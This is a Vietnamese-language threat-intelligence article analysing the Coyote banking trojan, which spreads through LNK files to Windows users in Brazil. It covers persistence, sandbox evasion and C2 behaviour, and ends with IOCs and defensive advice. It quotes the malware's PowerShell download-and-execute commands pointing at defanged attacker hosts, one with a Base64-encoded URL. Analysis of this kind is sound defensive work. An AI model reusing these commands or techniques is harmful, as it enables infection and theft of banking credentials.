Mã độc Coyote: Tấn công lén lút thông qua file LNK, nhắm tới hơn 1.000 trang web và hơn 70 tổ chức tài chính

Một cuộc tấn công bằng mã độc rất tinh vi và đang là làn sóng trong giới an toàn thông tin được phát hiện hiện bởi FortiGuard Labs trong thời gian qua. Cuộc tấn công này nhắm tới các người dùng máy tính Windows ở Brazil, mục tiêu là của một chiến dịch cung cấp phần mềm ngân hàng độc hại đươc gọi là Coyote. Chiến dịch tấn công này sử dung các file LNK có chứa các câu lệnh PowerShell được thiết kế để thực thi các script độc hại và kết nối tới các máy chủ điều khiển từ xa. Một khi được chạy, mã độc này có các hành vi như chụp lại màn hình, đánh cắp thông tin tài khoản thông qua phishing, keylogging.

Quá trình tấn công

Theo nghiên cứu của FortiGuard Labs, đầu tiên file shortcut LNK với các tham số khả nghi ở trường “Target“ sẽ thực thi và chạy một lệnh PowerShell kết nối tới môt máy chủ điều khiển từ xa. Đoạn lệnh đó như sau:

-w hid -noni -ep Bypass -c “Start-Job -Name PSSGR -ScriptBlock { IEX (iwr -Uri ‘hxxps://tbet[.]geontrigame[.]com/zxchzzmism’ -UseBasicParsing).Content }; Start-Sleep 131.”

Sau khi thực thi, nạn nhân sẽ kết nối tới máy chủ điều khiển từ xa (tbet.geontrigame[.]com) và sau đó sẽ tải thêm các payload và thực thi chúng cho cuộc tấn công. Các nhà nghiên cứu đã phân tích các file LNK khác nhau và phát hiện các URL khác nhau trong tham số:

Nội dung trong tệp PowerShell được tải xuống chứa 2 đoạn dữ liệu mã hóa như sau:

Sau khi được giải mã, đoạn mã trên sẽ được chèn vào bộ nhớ sử dụng các hàm Windows API như VirtualAllocEx và WriteProcessMemory. Tiến trình này được thưc hiện môt DLL loader (bmwiMcDec) để chèn payload npuGDec.

Sau đó mã đôc sẽ tạo Persistence bằng cách thay đổi Windows Registry tại “HCKU\Software\Microsoft\Windows\CurrentVersion\Run“. Đầu tiên nó sẽ kiểm tra xem có tồn tại câu lệnh PowerShell nào trong mục này không, nếu có thì sẽ xóa và tạo môt mục mới với tên ngẫu nhiên. Mục này có chứa câu lênh PowerShell để tải và thực thi môt URL được mã hóa Base64 mà chứa các chức năng chính của mã độc Coyote. URL sau khi được giải mã là

hxxps://yezh[.]geontrigame[.]com/vxewhcacbfqnsw

Nếu là mục tiêu mới, mã độc sẽ thu thâp thông tin máy như tên thiết bị, username, thông tin hệ điều hành và gửi tới máy chủ kẻ tấn công. Nó cũng sẽ tìm kiếm các chương tình diệt virus được cài đặt trên máy bằng cách truy vấn SecurityCenter2 namespace trong Windows Management Instrumentation (WMI). Thông tin sau đó sẽ được ngăn cách bởi dấu “|“, sau đó mã hóa Base64 và sau đó đảo ngược. Chuỗi này sau đó sẽ được thêm vào tham số và gửi về máy chủ điều khiển từ xa như URL ví dụ sau:

hxxps://yezh[.]geontrigame[.]com/hqizjs/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfzlmcoNEf0IDR0Ul(omit)

Sau khi thiết lập và kiểm tra, mã độc sẽ goi tới CreateProcess để thực thi lệnh PowerShell vừa thêm vào Registry để gọi tới payload sau:

powershell -w hid -noni -ep Bypass -c “$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly95ZXpoLmdlb250cmlnYW1lLmNvbS92eGV3aGNhY2JmcW5zdw=='));IEX $w.DownloadString($u).”

Payload này tương tự với payload được tải xuống từ file LNK nhưng lớn hơn vì chứa phần chính của mã độc Coyote

Sau khi giải mã thì đoạn payload trên có các chức năng như sau:

• Kiểm tra username nếu username là tên test hoặc sandbox tồn tại như: Johnson, Miller, maltest, Sandbox, John Doe…

• Kiểm tra môi trường có chứa các folder liên quan đến máy ảo. Nó sẽ kiểm tra các chuỗi trong “C:\Windows\System32“ có chứa qemu-ga, qemuwmi, balloon.sys, netkvm.sys, vioinput, viofs.sys, và vioser.sys.

• Xây dựng một danh sách mục tiêu: Mã độc Coyote mở rộng danh sách mục tiêu bao gồm 1.030 trang web và 73 doanh nghiệp tài chính.

• Kết nối tới máy chủ C2: Coyote sẽ tiếp tục theo dõi các thiết bị hoạt động để phát hiện xem nếu nạn nhân có kết nối tới các mục tiêu không. Nếu có kết nối tới mục tiêu, nó sẽ truyền thông tin tới máy chủ C2 thông qua cổng 443. Thông tin các server bao gồm: eraatualiza[.]com, masterdow[.]com, và geraupdate[.]com. Tùy theo thông tin trả về từ C2 server mà mã độc sẽ thực hiện các hành vi như xem, chụp màn hình, nhấn chuột, thực hiện keylogger, tắt thiết bị…

Attack chain của mã độc Coyote như sau:

IOC

1. URL

   • hxxps://btee[.]geontrigame[.]com/mvkrouhawm

   • jxxps://qmnw[.]daowsistem[.]com/fayikyeund

   • hxxps://bhju[.]daowsistem[.]com/iwywybzqxk

   • hxxps://lgfd[.]daowsistem[.]com/riqojhyvnr

   • hxxps://leme[.]daowsistem[.]com/omzowcicwp

   • hxxps://igow[.]scortma[.]com/fqieghffbm

   • hxxps://quit[.]scortma[.]com/xzcpnnfhxi

   • hxxps://llue[.]geontrigame[.]com/byyyfydxyf

   • hxxps://cxmp[.]scortma[.]com/qfutdbtqqu

   • hxxps://xrxw[.]scortma[.]com/gmdroacyvi

   • hxxps://qfab[.]geontrigame[.]com/vfofnzihsm

   • hxxps://tbet[.]geontrigame[.]com/zxchzzmism

   • hxxps://yezh[.]geontrigame[.]com/vxewhcacbfqnsw

2. Host

   • geraatualiza[.]com

   • masterdow[.]com

   • geraupdate[.]com

3. File SHA-256 hash

   • 362af8118f437f9139556c59437544ae1489376dc4118027c24c8d5ce4d84e48

   • 330dffe834ebbe4042747bbe00b4575629ba8f2507bccf746763cacf63d655bb

   • 33cba89eeeaf139a798b7fa07ff6919dd0c4c6cf4106b659e4e56f15b5809287

   • 552d53f473096c55a3937c8512a06863133a97c3478ad6b1535e1976d1e0d45f

   • 64209e2348e6d503ee518459d0487d636639fa5e5298d28093a5ad41390ef6b0

   • 67f371a683b2be4c8002f89492cd29d96dceabdbfd36641a27be761ee64605b1

   • 73ad6be67691b65cee251d098f2541eef3cab2853ad509dac72d8eff5bd85bc0

   • 7cbfbce482071c6df823f09d83c6868d0b1208e8ceb70147b64c52bb8b48bdb8

   • 839de445f714a32f36670b590eba7fc68b1115b885ac8d689d7b344189521012

   • bea4f753707eba4088e8a51818d9de8e9ad0138495338402f05c5c7a800695a6

   • f3c37b1de5983b30b9ae70c525f97727a56d3874533db1a6e3dc1355bfbf37ec

   • fd0ef425d34b56d0bc08bd93e6ecb11541bd834b9d4d417187373b17055c862e

Khuyến nghị

Với việc phương thức tấn công phức tạp và tinh vi, FPT Threat Intelligence có các khuyến nghị sau:

• Thường xuyên cập nhật phần mềm Antivirus để phát hiện và ngăn chặn các mã độc mới nhất

• Cập nhật các IOC liên quan đến mã độc

• Không mở các file lạ, file khả nghi

• Có các biên pháp giám sát phát hiện các hoạt động, hành vi bất thường trên thiết bị cuối như EDR, XDR…

Tham khảo

1. Coyote Banking Trojan: A Stealthy Attack via LNK Files | FortiGuard Labs

2. Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions

3. Coyote Banking Malware Weaponizing Windows LNK Files To Execute Malicious Scripts